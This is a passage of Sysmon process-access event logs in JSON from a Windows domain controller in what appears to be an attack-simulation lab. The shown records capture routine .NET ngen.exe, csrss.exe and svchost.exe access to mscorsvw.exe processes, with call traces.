05:58:35.824","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001001D10D00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6889,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.824\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001001D10D00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.824","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001001D10D00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6890,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.824\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001001D10D00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.824","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001001D10D00}","TargetProcessId":"2944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6891,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.855\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-00107ED40D00}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.855","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-00107ED40D00}","TargetProcessId":"4644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6892,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.855\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-00107ED40D00}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.855","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-00107ED40D00}","TargetProcessId":"4644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6893,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.871\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-00107ED40D00}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.871","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-00107ED40D00}","TargetProcessId":"4644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6894,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.949\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001089D80D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.949","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001089D80D00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6895,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.949\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001089D80D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.949","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001089D80D00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6896,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.949\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001089D80D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 